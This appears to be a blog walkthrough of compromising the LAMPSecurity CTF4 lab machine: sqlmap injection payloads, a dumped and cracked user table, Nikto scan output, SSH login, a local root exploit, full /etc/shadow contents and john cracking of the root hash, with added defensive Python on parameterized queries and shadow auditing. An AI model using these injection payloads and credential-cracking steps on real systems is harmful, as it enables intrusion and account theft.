[01:18:49] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[01:18:49] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[01:18:49] [INFO] target URL appears to have 5 columns in query
[01:18:49] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection points with a total of 40 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: page=blog&title=Blog&id=2 AND 6954=6954

Type: UNION query
Title: MySQL UNION query (NULL) - 5 columns
Payload: page=blog&title=Blog&id=2 UNION ALL SELECT NULL,CONCAT(0x716b707171,0x69637369434f4f546370,0x71707a7671),NULL,NULL,NULL#

Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind (SELECT)
Payload: page=blog&title=Blog&id=2 AND (SELECT * FROM (SELECT(SLEEP(5)))VbJV)
---
do you want to exploit this SQL injection? [Y/n]
[01:19:18] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Fedora 5 (Bordeaux)
web application technology: Apache 2.2.0, PHP 5.1.2
back-end DBMS: MySQL 5.0.11
[01:19:18] [INFO] skipping 'http://192.168.56.101:80/index.html?page=blog&title=Blog&id=5'
[01:19:18] [INFO] skipping 'http://192.168.56.101:80/index.html?page=blog&title=Blog&id=6'
[01:19:18] [INFO] skipping 'http://192.168.56.101:80/index.html?page=blog&title=Blog&id=7'
[01:19:18] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/root/.sqlmap/output/results-10242015_0118am.csv'

[*] shutting down at 01:19:18
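
To see why sqlmap reported the id parameter as injectable with exactly five columns, here is an added example (not the CTF4 application's code) that reproduces the blog query against an in-memory SQLite table, with the string-concatenated query beside a bound-parameter version. The table layout and rows are constructed, and SQLite's || stands in for MySQL's CONCAT() in sqlmap's marker payload.

```python
"""The CTF4 blog's 'id' parameter reproduced against an in-memory SQLite
table, so the page's boolean-based payload and the UNION marker payload can
be seen working against string concatenation and failing against a bound
parameter.  Added example, not the CTF4 application's code: the 'blog'
table (five columns, matching the 'appears to have 5 columns' line sqlmap
printed) and its rows are constructed.  SQLite has no CONCAT(), so the
hex-encoded marker from sqlmap's payload is written with '||' instead."""
import sqlite3

COLUMNS = "id, title, body, author, posted"


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for the blog table behind index.html?page=blog."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE blog (id INTEGER, title TEXT, body TEXT, author TEXT, posted TEXT)")
    db.executemany("INSERT INTO blog VALUES (?, ?, ?, ?, ?)", [
        (2, "Blog", "second post", "achen", "2009-03-10"),
        (5, "Blog", "fifth post", "pmoore", "2009-03-11"),
    ])
    return db


def fetch_post_unsafe(db, id_param: str) -> list:
    """String concatenation: the request value becomes part of the statement."""
    return db.execute(f"SELECT {COLUMNS} FROM blog WHERE id=" + id_param).fetchall()


def fetch_post_safe(db, id_param: str) -> list:
    """Bound parameter plus a type check: the value can only ever be a number."""
    try:
        id_value = int(id_param)
    except ValueError:
        return []
    return db.execute(f"SELECT {COLUMNS} FROM blog WHERE id=?", (id_value,)).fetchall()


def union_column_count_fits(db, n_columns: int) -> bool:
    """Does 'UNION ALL SELECT NULL,...' with n_columns NULLs execute?  This is
    the probe behind sqlmap's 'target URL appears to have 5 columns' line."""
    nulls = ",".join(["NULL"] * n_columns)
    try:
        fetch_post_unsafe(db, f"2 UNION ALL SELECT {nulls}")
        return True
    except sqlite3.OperationalError:      # column-count mismatch raises here
        return False


# sqlmap's payloads from the page; 0x716b707171 / 0x69637369434f4f546370 /
# 0x71707a7671 decode to 'qkpqq' / 'icsiCOOTcp' / 'qpzvq'.
BOOLEAN_TRUE = "2 AND 6954=6954"
BOOLEAN_FALSE = "2 AND 6954=6955"
UNION_MARKER = "2 UNION ALL SELECT NULL,'qkpqq'||'icsiCOOTcp'||'qpzvq',NULL,NULL,NULL"


def marker_reflected(rows: list) -> bool:
    """True when the UNION marker comes back in the title column, which is
    how sqlmap confirms a UNION injection and the column it can read from."""
    return any(r[1] == "qkpqqicsiCOOTcpqpzvq" for r in rows)


if __name__ == "__main__":
    db = make_db()
    print("unsafe, TRUE condition :", fetch_post_unsafe(db, BOOLEAN_TRUE))
    print("unsafe, FALSE condition:", fetch_post_unsafe(db, BOOLEAN_FALSE))
    print("unsafe, UNION marker   :", marker_reflected(fetch_post_unsafe(db, UNION_MARKER)))
    print("4 / 5 columns fit      :", union_column_count_fits(db, 4), union_column_count_fits(db, 5))
    print("safe, TRUE condition   :", fetch_post_safe(db, BOOLEAN_TRUE))
    print("safe, plain id         :", fetch_post_safe(db, "2"))
```

The boolean pair shows the true/false oracle behind "boolean-based blind", and the column probe shows why the UNION test stopped at five; the bound-parameter version returns nothing for every payload and the row only for a plain id.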


Took a database dump for the user accounts and hashes :
sqlmap -u http://192.168.56.101 --crawl=5 --dbms=mysql --dump --threads=5


+++ Truncated O/p +++
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y
[01:31:14] [INFO] writing hashes to a temporary file '/tmp/sqlmap_bywwj4272/sqlmaphashes-lLP7FS.txt'
do you want to crack them via a dictionary-based attack? [y/N/q]
Database: ehks
Table: user
[6 entries]
+---------+-----------+----------------------------------+
| user_id | user_name | user_pass                        |
+---------+-----------+----------------------------------+
| 1       | dstevens  | 02e823a15a392b5aa4ff4ccb9060fa68 |
| 2       | achen     | b46265f1e7faa3beab09db5c28739380 |
| 3       | pmoore    | 8f4743c04ed8e5f39166a81f26319bb5 |
| 4       | jdurbin   | 7c7bc9f465d86b8164686ebb5151a717 |
| 5       | sorzek    | 64d1f88b9b276aece4b0edcc25b7a434 |
| 6       | ghighland | 9f3eb3087298ff21843cc4e013cf355f |
+---------+-----------+----------------------------------+


++++++++++++++++

Cracking the hashes for the accounts :

1. dstevens: iliketosurf
2. achen: seventysixers
3. pmoore: Homesite
4. jdurbin: Sue1978
5. sorzek: pacman
6. ghighland: undone1

So we have all the SQL usernames and passwords now!


From Nikto we found some more paths :
==============================================
root@kali:~/vulhub/ct4# nikto -h http://192.168.56.101
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.101
+ Target Hostname: 192.168.56.101
+ Target Port: 80
+ Start Time: 2015-10-24 01:16:56 (GMT1)
---------------------------------------------------------------------------
+ Server: Apache/2.2.0 (Fedora)
+ Retrieved x-powered-by header: PHP/5.1.2
+ The anti-clickjacking X-Frame-Options header is not present.
+ Server leaks inodes via ETags, header found with file /robots.txt, inode: 487720, size: 104, mtime: Tue Dec 9 23:39:44 2014
+ File/dir '/mail/' in robots.txt returned a non-forbidden or redirect HTTP code (302)
+ File/dir '/conf/' in robots.txt returned a non-forbidden or redirect HTTP code (500)
+ OSVDB-3268: /sql/: Directory indexing found.
+ File/dir '/sql/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ File/dir '/admin/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 5 entries which should be manually viewed.
+ Apache/2.2.0 appears to be outdated (current is at least Apache/2.4.7). Apache 2.0.65 (final release) and 2.2.26 are also current.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-5034: /admin/login.php?action=insert&username=test&password=test: phpAuction may allow user admin accounts to be inserted without proper authentication. Attempt to log in with user 'test' password 'test' to verify.
+ OSVDB-682: /usage/: Webalizer may be installed. Versions lower than 2.01-09 vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3092: /admin/: This might be interesting...
+ OSVDB-3268: /pages/: Directory indexing found.
+ OSVDB-3092: /pages/: This might be interesting...
+ OSVDB-3093: /admin/index.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ Cookie SQMSESSID created without the httponly flag
+ OSVDB-3093: /mail/src/read_body.php: SquirrelMail found
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3268: /images/: Directory indexing found.
+ OSVDB-3268: /images/?pattern=/etc/*&sort=name: Directory indexing found.
+ OSVDB-9624: /admin/admin.php?adminpy=1: PY-Membres 4.2 may allow administrator access.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /admin/login.php: Admin login page/section found.
+ 7500 requests: 1 error(s) and 30 item(s) reported on remote host

+ End Time: 2015-10-24 01:17:32 (GMT1) (36 seconds)
---------------------------------------------------------------------------


Trying to log in using the user / password pairs we gathered from the previous sqlmap step :







Login successful, but no admin console is visible, so let's try the other logins..


To Gain Shell :

First step, let's try to get a shell on the host. We recovered multiple user / password pairs above, so let's try some of those IDs..

I randomly picked "achen", and it works!! I have a shell now.

root@kali:~/vulhub/ct4# ssh achen@192.168.56.101
The authenticity of host '192.168.56.101 (192.168.56.101)' can't be established.
RSA key fingerprint is e7:70:d3:81:00:41:b8:6e:fd:31:ae:0e:00:ea:5c:b4.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.56.101' (RSA) to the list of known hosts.
BSD SSH 4.1
achen@192.168.56.101's password:
Last login: Tue Mar 10 12:45:06 2009
[achen@ctf4 ~]$ whoami
achen
[achen@ctf4 ~]$ id
uid=501(achen) gid=501(achen) groups=100(users),501(achen),507(admins) context=user_u:system_r:unconfined_t
[achen@ctf4 ~]$ uname -a
Linux ctf4.sas.upenn.edu 2.6.15-1.2054_FC5 #1 Tue Mar 14 15:48:33 EST 2006 i686 i686 i386 GNU/Linux
[achen@ctf4 ~]$ cat /etc/issue
Fedora Core release 5 (Bordeaux)
Kernel \r on an \m

[achen@ctf4 ~]$

Privilege Escalation :
After a lot of research, I got this: http://www.securityfocus.com/bid/18874/exploit. Downloaded and copied the exploit onto the victim host.




On the victim node, gave exec permissions and then ran the exploit script :


[achen@ctf4 ~]$ chmod +x zmia-jul14-2006.sh

[achen@ctf4 ~]$ ./zmia-jul14-2006.sh
wait aprox 4 min to get sh

sh-3.1# id
uid=0(root) gid=0(root) groups=100(users),501(achen),507(admins) context=user_u:system_r:unconfined_t


We are ROOT

Observation:

OS:
sh-3.1# cat /etc/issue
Fedora Core release 5 (Bordeaux)
Kernel \r on an \m

You have new mail in /var/spool/mail/achen

sh-3.1# uname -a
Linux ctf4.sas.upenn.edu 2.6.15-1.2054_FC5 #1 Tue Mar 14 15:48:33 EST 2006 i686 i686 i386 GNU/Linux


Passwords :
sh-3.1# cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
distcache:x:94:94:Distcache:/:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
netdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bash
pcap:x:77:77::/var/arpwatch:/sbin/nologin
avahi:x:70:70:Avahi daemon:/:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
gdm:x:42:42::/var/gdm:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
dstevens:x:500:506:Don Stevens:/home/dstevens:/bin/bash
achen:x:501:501:Andrew Chen:/home/achen:/bin/bash
pmoore:x:502:502:Phillip Moore:/home/pmoore:/bin/bash
jdurbin:x:503:503:James Durbin:/home/jdurbin:/bin/bash
sorzek:x:504:504:Sally Orzek:/home/sorzek:/bin/bash
ghighland:x:505:505:Greg Highland:/home/ghighland:/bin/bash
ossec:x:506:508::/var/ossec:/sbin/nologin
ossecm:x:507:508::/var/ossec:/sbin/nologin
ossecr:x:508:508::/var/ossec:/sbin/nologin


sh-3.1# cat /etc/shadow
root:$1$DSHH/MlC$DH8ClhHKeagYW4PwxICZC0:14309:0:99999:7:::
bin:*:14309:0:99999:7:::
daemon:*:14309:0:99999:7:::
adm:*:14309:0:99999:7:::
lp:*:14309:0:99999:7:::
sync:*:14309:0:99999:7:::
shutdown:*:14309:0:99999:7:::
halt:*:14309:0:99999:7:::
mail:*:14309:0:99999:7:::
news:*:14309:0:99999:7:::
uucp:*:14309:0:99999:7:::
operator:*:14309:0:99999:7:::
games:*:14309:0:99999:7:::
gopher:*:14309:0:99999:7:::
ftp:*:14309:0:99999:7:::
nobody:*:14309:0:99999:7:::
dbus:!!:14309:0:99999:7:::
rpm:!!:14309:0:99999:7:::
apache:!!:14309:0:99999:7:::
distcache:!!:14309:0:99999:7:::
ntp:!!:14309:0:99999:7:::
nscd:!!:14309:0:99999:7:::
vcsa:!!:14309:0:99999:7:::
webalizer:!!:14309:0:99999:7:::
dovecot:!!:14309:0:99999:7:::
mysql:!!:14309:0:99999:7:::
netdump:!!:14309:0:99999:7:::
pcap:!!:14309:0:99999:7:::
avahi:!!:14309:0:99999:7:::
named:!!:14309:0:99999:7:::
mailnull:!!:14309:0:99999:7:::
smmsp:!!:14309:0:99999:7:::
haldaemon:!!:14309:0:99999:7:::
rpc:!!:14309:0:99999:7:::
xfs:!!:14309:0:99999:7:::
gdm:!!:14309:0:99999:7:::
rpcuser:!!:14309:0:99999:7:::
nfsnobody:!!:14309:0:99999:7:::
sshd:!!:14309:0:99999:7:::
dstevens:$1$fU8HOHqa$N542xtl0ft8NmsYkv5NFo/:14309:0:99999:7:::
achen:$1$kxyn25Oz$w.MMADGQYIq4F52hi9DUQ.:14309:0:99999:7:::
pmoore:$1$p0RXlomV$m03UsjoTZ08qG8gbWHgST0:14309:0:99999:7:::
jdurbin:$1$CYmEyuc.$FXAeZHkhywwENbqE8h0O.0:14309:0:99999:7:::
sorzek:$1$cWeWNRdU$VTtlKsoRBmhMghnkSwqCQ.:14312:0:99999:7:::
ghighland:$1$ooKvtZEY$N2RpSaIylgFlHnBkbwUGz0:14309:0:99999:7:::
ossec:!!:14312:0:99999:7:::
ossecm:!!:14312:0:99999:7:::
ossecr:!!:14312:0:99999:7:::

Netstat Output
sh-3.1# netstat -a
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 *:mysql *:* LISTEN
tcp 0 0 *:sunrpc *:* LISTEN
tcp 0 0 *:58194 *:* LISTEN
tcp 0 0 *:smtp *:* LISTEN
tcp 0 0 *:imaps *:* LISTEN
tcp 0 0 *:pop3s *:* LISTEN
tcp 0 0 *:pop3 *:* LISTEN
tcp 0 0 *:imap *:* LISTEN
tcp 0 0 *:http *:* LISTEN
tcp 0 0 *:ssh *:* LISTEN
tcp 0 0 *:https *:* LISTEN


sh-3.1# df -kl
Filesystem 1K-blocks Used Available Use% Mounted on
/dev/mapper/VolGroup00-LogVol00
2888460 1757260 982108 65% /
/dev/hda1 101086 9967 85900 11% /boot
tmpfs 1038136 0 1038136 0% /dev/shm

sh-3.1# mount
/dev/mapper/VolGroup00-LogVol00 on / type ext3 (rw)
proc on /proc type proc (rw)
sysfs on /sys type sysfs (rw)
devpts on /dev/pts type devpts (rw,gid=5,mode=620)
/dev/hda1 on /boot type ext3 (rw)
tmpfs on /dev/shm type tmpfs (rw)
none on /proc/sys/fs/binfmt_misc type binfmt_misc (rw)
sunrpc on /var/lib/nfs/rpc_pipefs type rpc_pipefs (rw)
automount(pid1528) on /net type autofs (rw,fd=4,pgrp=1528,minproto=2,maxproto=4)


Now that we have privileged access to the system and can read both the shadow and passwd files, we can crack the root password. unshadow merges the two files into the format john expects, and grep pulls out just the root entry:
root@kali:~/vulhub/ct4# unshadow passwd shadow > unshadow.txt
root@kali:~/vulhub/ct4# grep root unshadow.txt > root.txt
root@kali:~/vulhub/ct4# cat root.txt
root:$1$DSHH/MlC$DH8ClhHKeagYW4PwxICZC0:0:0:root:/root:/bin/bash

root@kali:~/vulhub/ct4# john root.txt
Loaded 1 password hash (FreeBSD MD5 [128/128 SSE2 intrinsics 12x])
root1234 (root)
guesses: 1 time: 0:00:00:00 DONE (Tue Oct 27 19:59:06 2015) c/s: 4320 trying: Root888 - root7777
Use the "--show" option to display all of the cracked passwords reliably

root@kali:~/vulhub/ct4# john --show root.txt
root:root1234:0:0:root:/root:/bin/bash

1 password hash cracked, 0 left
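The reason john finishes in a fraction of a second above is visible in the shadow dump itself: every hash starts with $1$, the md5crypt scheme, which is fast to compute and therefore fast to brute-force. The following Python script is an added example, not part of the original walkthrough, showing the audit a defender would run on /etc/shadow: it parses shadow(5) records, classifies the hash scheme by its $id$ prefix, flags md5crypt and empty password fields, and checks password age against the max-age field. The sample records are constructed placeholders of the right shape, not the Kioptrix host's real hashes.

```python
"""Audit /etc/shadow records for weak hash schemes and account state.

Added example (not from the original walkthrough). Parses shadow(5) lines
and reports what a defender would act on: md5crypt ($1$) hashes that john
cracks in seconds, empty password fields, and passwords past their max age.
"""
from datetime import date, timedelta

# Hash prefixes defined by crypt(5); $1$ is the md5crypt scheme seen on the victim.
ALGORITHMS = {
    "$1$": "md5crypt",
    "$2a$": "bcrypt",
    "$2b$": "bcrypt",
    "$2y$": "bcrypt",
    "$5$": "sha256crypt",
    "$6$": "sha512crypt",
    "$7$": "scrypt",
    "$y$": "yescrypt",
}
WEAK_ALGORITHMS = {"md5crypt", "descrypt"}
EPOCH = date(1970, 1, 1)


def classify_hash(field):
    """Classify the password field of a shadow record.

    Returns (state, algorithm): state is 'empty' (no password at all),
    'locked' (field starts with '!' or '*') or 'hashed'.
    """
    if field == "":
        return ("empty", None)
    if field[0] in "!*":
        return ("locked", None)
    for prefix, name in ALGORITHMS.items():
        if field.startswith(prefix):
            return ("hashed", name)
    # A 13-character field with no $id$ prefix is traditional DES crypt.
    return ("hashed", "descrypt" if len(field) == 13 else "unknown")


def parse_shadow_line(line):
    """Parse one shadow(5) line into the fields an audit needs."""
    fields = line.rstrip("\n").split(":")
    if len(fields) < 9:
        raise ValueError(f"malformed shadow record: {line!r}")
    user, pw, lastchg, _min_days, max_days = fields[:5]
    state, algorithm = classify_hash(pw)
    return {
        "user": user,
        "state": state,
        "algorithm": algorithm,
        "weak": algorithm in WEAK_ALGORITHMS,
        # Third field is days since the epoch, e.g. 14309 -> 2009-03-06.
        "last_changed": EPOCH + timedelta(days=int(lastchg)) if lastchg else None,
        "max_days": int(max_days) if max_days else None,
    }


def audit_shadow(text, today):
    """Return a list of findings for a shadow file passed as one string."""
    findings = []
    for line in text.splitlines():
        if not line.strip():
            continue
        rec = parse_shadow_line(line)
        if rec["state"] == "empty":
            findings.append(f"{rec['user']}: empty password field (login without password)")
        elif rec["state"] == "hashed" and rec["weak"]:
            findings.append(f"{rec['user']}: weak hash scheme {rec['algorithm']}")
        if (rec["state"] == "hashed" and rec["last_changed"] is not None
                and rec["max_days"] is not None
                and (today - rec["last_changed"]).days > rec["max_days"]):
            findings.append(f"{rec['user']}: password older than max age ({rec['max_days']} days)")
    return findings


# Constructed sample records: salts and hashes are placeholders of the right
# shape, not the victim's real values; only the $id$ prefixes matter here.
SAMPLE_SHADOW = """\
root:$1$CONSTRUC$0123456789abcdefghijkl:14309:0:99999:7:::
bin:*:14309:0:99999:7:::
dbus:!!:14309:0:99999:7:::
guest::14309:0:99999:7:::
ops:$6$CONSTRUCTEDSALT$0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ:14309:0:90:7:::
"""

if __name__ == "__main__":
    for finding in audit_shadow(SAMPLE_SHADOW, today=date(2015, 10, 27)):
        print(finding)
```

On a modern distribution the fix for the first finding is to move accounts to sha512crypt or yescrypt (the ENCRYPT_METHOD setting in /etc/login.defs) and force a password change so the old $1$ hashes are replaced; the script also makes the 14309 timestamp readable, showing every account on this host last changed its password in March 2009.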

Saturday, October 24, 2015

Common TCP/IP Ports For Penetration Testers

Some of the ports of interests for penetration testers are :

Port   Usage                                        Protocol   Some Enumeration Commands and Tools
21     FTP                                          TCP        Nmap NSE
22     SSH                                          TCP,UDP    TBD
23     Telnet                                       TCP        TBD
25     SMTP                                         TCP        Nmap NSE
53     DNS                                          TCP,UDP    Nmap NSE, dnsrecon, nslookup
80     HTTP                                         TCP,UDP    Nmap NSE, nikto, dirbuster
123    NTP                                          TCP        TBD
135    Microsoft RPC                                TCP,UDP    Nmap NSE
137    NetBIOS Name Service                         TCP,UDP    Nmap NSE
139    NetBIOS Session Service, Samba (SMB, CIFS)   TCP,UDP    Nmap NSE, smbclient
161    SNMP                                         TCP,UDP    snmpwalk, onesixtyone
162    SNMP Trap                                    TCP,UDP    snmpwalk, onesixtyone
389    LDAP                                         TCP,UDP    TBD
443    HTTPS                                        TCP,UDP    Nmap NSE, nikto, dirbuster
445    Microsoft-ds                                 TCP        Nmap NSE, PsExec, nbtstat
3306   MySQL                                        TCP        Nmap NSE, sqlmap
3368   Global Catalogue                             TCP        TBD
3389   RDP                                          TCP        TBD
List of Ports and usage


If you have any suggestions, please leave them in the comments below and I will add them here.
